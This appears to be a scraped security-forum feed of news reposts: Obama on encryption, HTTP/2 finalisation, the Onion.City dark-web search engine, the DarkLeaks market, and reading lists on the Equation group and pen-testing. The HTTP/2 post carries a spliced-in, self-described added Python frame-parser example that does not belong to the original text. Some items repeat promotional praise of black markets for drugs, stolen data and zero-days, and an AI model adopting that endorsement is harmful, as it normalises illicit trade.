kind of compromised encryption are far greater." Obama also conceded that the ongoing Snowden disclosures have affected relations between Silicon Valley and the US government. "The Snowden disclosures were really harmful in terms of the trust between the government and many of these companies, in part because it had an impact on their bottom lines."
A transcript of the full interview, which also covered cyber warfare and a variety of other hi-tech topics, can be found here. A video clip of the segment of the interview where Obama talks about encryption can be found at the top of this story. Despite the furore over the recent megahack on Sony, which the US government blames on North Korea, Obama dismissed the NORKs as no great shakes when it came to offensive cyber warfare, while stating that "China and Russia are very good [and] Iran is good." Source
-
Kaspersky discovered a virus in WD and Seagate HDDs
Aerosol replied to Aerosol's topic in Security News
Eh, anyway the post is clearly an attack on the USA, as Nytro said too; as for marketing, they could have found anything... @Nytro exactly like the Kaspersky thing a year ago.
-
@AGSQ it didn't show up in the search, bro, so I posted it (anyway, he posted it for download, I posted it directly on the site for those who don't have time to download it, so it's fine.)
-
Good news for Internet folks! Get ready, as the entire web you know is about to change. The new and long-awaited version of HTTP took a major step toward becoming a reality on Wednesday: it has been officially finalized and approved. Mark Nottingham, chairman of the Internet Engineering Task Force (IETF) working group behind creating the standard, announced in a blog post that the HTTP 2.0 specifications have been formally approved. Now the specifications will go through a last formality, the Request for Comments and editorial processes, before being published as a standard. LARGEST CHANGE IN HTTP OVER LAST 16 YEARS HTTP, or Hypertext Transfer Protocol, is one of the web standards familiar to most as the http:// at the beginning of a web address. The HTTP protocol, invented by the father of the web, Sir Tim Berners-Lee, governs the connections between a user's browser and the server hosting a website. HTTP/2 is simply an update to the protocol, but it is a huge deal because the last time the HTTP specification was updated was back in 1999. This means HTTP/2 will be the first major update to the HTTP standard in 16 years, marking the largest change since 1999, when HTTP 1.1, which underpins the World Wide Web as we know it today, was adopted. WHAT IS HTTP/2 ? HTTP/2 promises to deliver Web pages to browsers faster, allowing online users to read more pages, buy more things and perform more and faster Internet searches. HTTP/2 is based on the SPDY protocol, a protocol introduced by Google in 2009 and adopted by some technologies including Google's own Chrome browser, Mozilla's Firefox, Microsoft's Internet Explorer, many websites such as Facebook, and some of the software that delivers Web pages to browsers. SPDY (fittingly pronounced "speedy") was designed to speed up the loading of web pages and the browsing experience of online users.
Both SPDY and HTTP/2 use "header field compression" and "multiplexing" to let browsers make multiple requests to web servers via a single connection. BROWSE EVERYTHING FASTER HTTP/2 won't replace the traditional web standard that the world knows and loves, but it is expected to help websites load faster and more securely once it is adopted on a wide scale. PUSHES ENCRYPTION HTTP 2.0 also brings another big change: encryption. It was originally planned to require the encryption technology called TLS (Transport Layer Security, formerly called SSL, for Secure Sockets Layer) in HTTP/2, but this was rejected because of the inconvenience to certain network operators and proxy vendors of burdening them with new standards. However, Firefox and Chrome developers said that they won't support HTTP/2 unless it uses encryption. Therefore, Nottingham says, sites that want to get the benefit of faster browsing "will need to use TLS if they want to interoperate with the broadest selection of browsers." WHEN WILL USERS GET HTTP/2 ? As the specification of the HTTP/2 standard is finalized and approved, after going through some editorial processes HTTP/2 will be published and ready for adoption. Enjoying HTTP/2 on the Internet depends on websites, hosting services and companies such as Google implementing the standard. For its part, Google has already announced that it will adopt HTTP/2 in Chrome by early 2016. Users can expect Firefox to follow suit as well. More information is available in the HTTP/2 FAQ. Source
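The "multiplexing" mentioned in the post works at the framing layer: every HTTP/2 frame carries a 9-byte header with a 24-bit payload length, a type, flags and a 31-bit stream identifier, so frames belonging to different requests can be interleaved on one TCP connection and reassembled per stream. The following is an added example, not code from the post or from any HTTP/2 implementation. It encodes a constructed sequence of frames for two responses (streams 1 and 3) plus a connection-level SETTINGS frame on stream 0, parses them back and reassembles each stream's body. It also shows two checks a defensive parser should make from the frame header alone: rejecting a frame larger than the default maximum frame size, and rejecting a padded DATA frame whose padding length is not smaller than its payload. The HEADERS payloads are placeholder bytes, because real ones would be HPACK-compressed and are out of scope here.

```python
"""Parse HTTP/2 frames from a constructed byte stream and reassemble the
interleaved streams (frame layout per RFC 7540, section 4.1).

Added example. The frame bytes are constructed here, not captured from a
real server, and the HEADERS payloads are placeholders rather than HPACK.
"""
import struct
from dataclasses import dataclass, field

# Frame type codes from RFC 7540, section 6.
FRAME_TYPES = {0x0: "DATA", 0x1: "HEADERS", 0x2: "PRIORITY", 0x3: "RST_STREAM",
               0x4: "SETTINGS", 0x5: "PUSH_PROMISE", 0x6: "PING", 0x7: "GOAWAY",
               0x8: "WINDOW_UPDATE", 0x9: "CONTINUATION"}
TYPE_CODES = {name: code for code, name in FRAME_TYPES.items()}
END_STREAM = 0x1
END_HEADERS = 0x4
PADDED = 0x8
DEFAULT_MAX_FRAME_SIZE = 16384  # SETTINGS_MAX_FRAME_SIZE initial value (2^14)


@dataclass
class Frame:
    ftype: str
    flags: int
    stream_id: int
    payload: bytes


@dataclass
class StreamState:
    frames: list = field(default_factory=list)  # frame types seen, in order
    body: bytes = b""                            # reassembled DATA payload
    closed: bool = False                         # END_STREAM seen


def build_frame(ftype, flags, stream_id, payload):
    """Encode one frame: 3-byte length, 1-byte type, 1-byte flags, 4-byte stream id."""
    header = (struct.pack(">I", len(payload))[1:]
              + bytes([TYPE_CODES[ftype], flags])
              + struct.pack(">I", stream_id & 0x7FFFFFFF))
    return header + payload


def parse_frames(data, max_frame_size=DEFAULT_MAX_FRAME_SIZE):
    """Split a byte stream into frames, rejecting oversized or truncated ones."""
    frames, off = [], 0
    while off < len(data):
        if len(data) - off < 9:
            raise ValueError("truncated frame header")
        length = int.from_bytes(data[off:off + 3], "big")
        if length > max_frame_size:
            # RFC 7540 section 4.2: this is a FRAME_SIZE_ERROR; stop parsing.
            raise ValueError(f"frame length {length} exceeds max {max_frame_size}")
        type_code, flags = data[off + 3], data[off + 4]
        stream_id = struct.unpack(">I", data[off + 5:off + 9])[0] & 0x7FFFFFFF
        payload = data[off + 9:off + 9 + length]
        if len(payload) != length:
            raise ValueError("truncated frame payload")
        frames.append(Frame(FRAME_TYPES.get(type_code, f"UNKNOWN(0x{type_code:x})"),
                            flags, stream_id, payload))
        off += 9 + length
    return frames


def strip_padding(frame):
    """Remove Pad Length octet and trailing padding from a PADDED DATA frame."""
    if not frame.flags & PADDED:
        return frame.payload
    pad_len = frame.payload[0]
    if pad_len >= len(frame.payload):
        # RFC 7540 section 6.1: padding >= payload length is a PROTOCOL_ERROR.
        raise ValueError("padding length exceeds frame payload")
    return frame.payload[1:len(frame.payload) - pad_len]


def group_by_stream(frames):
    """Demultiplex frames into per-stream state, concatenating DATA bodies."""
    streams = {}
    for f in frames:
        st = streams.setdefault(f.stream_id, StreamState())
        st.frames.append(f.ftype)
        if f.ftype == "DATA":
            st.body += strip_padding(f)
        if f.flags & END_STREAM:
            st.closed = True
    return streams


def demo_connection():
    """Constructed stream: two responses interleaved on one connection."""
    wire = b"".join([
        build_frame("SETTINGS", 0, 0, b""),                          # connection-level
        build_frame("HEADERS", END_HEADERS, 1, b"<hpack block /a>"),  # placeholder
        build_frame("HEADERS", END_HEADERS, 3, b"<hpack block /b>"),  # placeholder
        build_frame("DATA", 0, 1, b"part one of /a, "),
        # stream 3 finishes with a padded DATA frame: Pad Length=3, then 3 pad bytes
        build_frame("DATA", END_STREAM | PADDED, 3, bytes([3]) + b"all of /b" + b"\x00" * 3),
        build_frame("DATA", END_STREAM, 1, b"part two of /a"),
    ])
    return group_by_stream(parse_frames(wire))


if __name__ == "__main__":
    for sid, st in demo_connection().items():
        print(sid, st.frames, st.body, "closed" if st.closed else "open")
```

Run stand-alone it prints one line per stream; stream 1's body is reassembled from its two non-adjacent DATA frames even though stream 3's frame sat between them, which is exactly what lets one connection carry several requests at once.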
-
There is an entire section of the Internet that you probably don't see on a daily basis. It's called the "Darknet" or "Deep Web", where all browsing is done anonymously. About a week ago, we reported on the 'Memex' Deep Web search engine, a Defense Advanced Research Projects Agency (DARPA) project to create a powerful new search engine that could find things on the deep web that aren't indexed by Google and other commercial search engines, but it isn't available to you and me. Now there is another search engine that will let anyone easily search the Deep Web for large swaths of information for free, and without an application; all you need is an Internet connection. Onion.City is a new search engine for online underground markets that makes it easier to find and buy drugs, guns and stolen credit cards directly from your Chrome, Internet Explorer or Firefox browser without installing and browsing via the Tor Browser. Just two days after the Memex story came to light, Virgil Griffith announced the Onion.City Deep Web search engine on the Tor-talk mailing list. It actually gives you the feel of a normal search engine, but can search the ".onion" domains on the Deep Web and throw up results in your normal browser. ONION.CITY — SEARCH ENGINE FOR TOR ONION SITES The Onion.City darknet search engine is powered by the Tor2web proxy, which enables it to reach deep into the anonymous Tor network, find ".onion" sites by aggregating the hidden marketplaces, and make them available to the normal web browser with the easiest navigation. The Tor Network is one of the most well-known Darknets, where web addresses follow the form of a random string of letters followed by the ".onion" suffix and are only accessible through the Tor browser. Online users visit and run so-called hidden services on ".onion" domains on the deep web, but the way to get to ".onion" websites is to first have a Tor browser.
However, the Onion City darknet search engine makes it easy and effective for Internet users to search the deep web from our favorite, insecure web browser. Those who aren't very familiar with the Deep Web can read our wonderful and detailed article on "What is the Deep Web? A first trip into the abyss". GRAMS — BLACK MARKET SEARCH ENGINE However, Onion.city isn't the first ever Deep Web search engine. Last year, the first search engine for online underground Black Markets, called Grams, was launched; it lets anyone easily find illegal drugs and other contraband online more easily than ever, and it's pretty fast, like the Google Search Engine. Search engines like Grams and Onion.city are mostly considered to be illegal or illicit, but not every website on the Deep Web is dubious. The Frequently Asked Questions (FAQs) on the Onion.City website even provide an email address to report content that may be illegal, though it's unclear exactly what steps they'll take. For now, leaving controversies aside, Onion.city seems to be a nice and effective Deep Web search engine, providing a means for regular web users to search for things they would otherwise have to work a little harder to find. Source
-
An all-new anonymous online underground black market website, DarkLeaks, has been introduced on the Internet, where whistleblowers, blackmailers, hackers and any individual can trade/sell sensitive and valuable data/secrets anonymously in exchange for Bitcoin payments. DarkLeaks is a decentralized underground black market which is built on top of the Bitcoin Blockchain technology and is available on the Internet to download as a free software package, together with its source code published openly on the code-sharing site Github. TRADE INFORMATION ANONYMOUSLY The DarkLeaks underground black market website is masterminded by the members of the crypto-anarchist collective System. "There is no identity, no central operator and no interaction between leaker and buyers," the developers' statement says. Blockchain technology was developed for secure Bitcoin payments, where users can make transactions directly without the need for any intermediary. Blockchain encrypts the files, which are released when payment is claimed by the leaker. NO LIMITS TO TRADE CONTENTS The developers of the DarkLeaks underground black market website said that it is the best tool to trade any kind of secret, illegal or confidential, but valuable data, including media, information, video, data and documents. The list of contents that can be shared is as follows:
- Hollywood movies
- Trade secrets
- Government secrets
- Proprietary source code
- Industrial designs like medicine or defence
- Zero day exploits
- Stolen databases
- Proof of tax evasion
- Military intelligence
- Celebrity sex pictures
- Corruption
HOW DOES DARKLEAKS WORK ? The files on sale are encrypted by the DarkLeaks black market website, broken into smaller pieces, and then added to Bitcoin's block chain. However, the service allows the buyer to verify a small preview piece of the file before payment is claimed. After the buyer purchases the rest of the file, when satisfied with the contents, the seller claims their Bitcoins.
A decryption key is provided to the buyer to unlock the encrypted document. "The mechanism involved makes the environment free from intervention." DON'T BE AFRAID, JOIN HANDS WITH US The concept is different, but isn't new, as many existing portals, such as the infamous WikiLeaks, are used for sharing secret information by whistleblowers and others, but there has never been an opportunity to exchange that information for profit. However, DarkLeaks is taking things to the next level, making the information-sharing portal a direct purchase transaction. The developers say that Darkleaks will help "stop corruption and challenge power", and at the same time encourage users by saying, "Don't be afraid. Come join the revolution and reclaim your freedom. The gloves are off. The revolt has begun." Source
-
Table of contents
1. What is the Equation group?
2. Why do you call them the "Equation" group?
3. What attack tools and malware does the Equation group use?
4. What is DOUBLEFANTASY?
5. What is EQUATIONDRUG?
6. What is GRAYFISH?
7. What is Fanny?
8. What exploits does the Equation group use?
9. How do victims get infected by EQUATION group malware?
10. What is the most sophisticated thing about the EQUATION group?
11. Have you observed any artifacts indicating who is behind the EQUATION group?
12. How many victims are there?
13. Have you seen any non-Windows malware from the Equation group?
14. What C&C infrastructure do the Equation group implants use?
15. How do victims get selected for infection by the EQUATION group?
16. What kind of encryption algorithms are used by the EQUATION group?
17. How do the EQUATION group's attack platforms compare with Regin?
18. How did you discover this malware?
Indicators of compromise ("one of each")
Read more here: http://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf
-
I searched the forum and didn't find it posted, so I figured I'd post it (for those interested, of course). Adversaries are committed to continually refining or developing new techniques that can evade detection and hide malicious activity. Meanwhile, the defenders—namely, security teams—must constantly improve their approach to protecting the organization and users from these increasingly sophisticated campaigns. Caught in the middle are the users. But now, it appears they not only are the targets, but also the complicit enablers of attacks. The Cisco 2015 Annual Security Report, which presents the research, insights, and perspectives provided by Cisco® Security Research and other security experts within Cisco, explores the ongoing race between attackers and defenders, and how users are becoming ever-weaker links in the security chain. Cybersecurity is a broad and complex topic that has a far-reaching impact on users, companies, governments, and other entities around the world. The Cisco 2015 Annual Security Report is divided into four areas of discussion. These sections, and the issues explored within them, may at first glance seem disparate, but closer examination reveals their interconnectedness: Read more: https://www.cisco.com/web/offer/gist_ty2_asset/Cisco_2015_ASR.pdf
-
Contents
Author BIOS
Executive Summary
What is Pen-Testing?
  Pen-Testing vs. Vulnerability Assessment
    How Vulnerabilities Are Identified
Why Perform Pen-Testing?
  Find Holes Now Before Somebody Else Does
  Report Problems To Management
  Verify Secure Configurations
  Security Training For Network Staff
  Discover Any Gaps In Compliance
  Testing New Technology
Pen-Testing Tools And Reporting
  Reconnaissance Tools:
    Nmap
    Nessus
    Packet Manipulation and Password Cracking Tools
  Exploitation Tools
    Metasploit Version 2.5
    SecurityForest Exploitation Framework
    CORE IMPACT (version 5.1)
  The Penetration Testing Report
Analysis Of CORE IMPACT
  Test Lab Network Diagram
  Detailed Review Of Test Lab
  Review Of CORE IMPACT
Conclusion
Metasploit Framework 3.0
Read more: http://www.sans.org/reading-room/whitepapers/analyst/penetration-testing-assessing-security-attackers-34635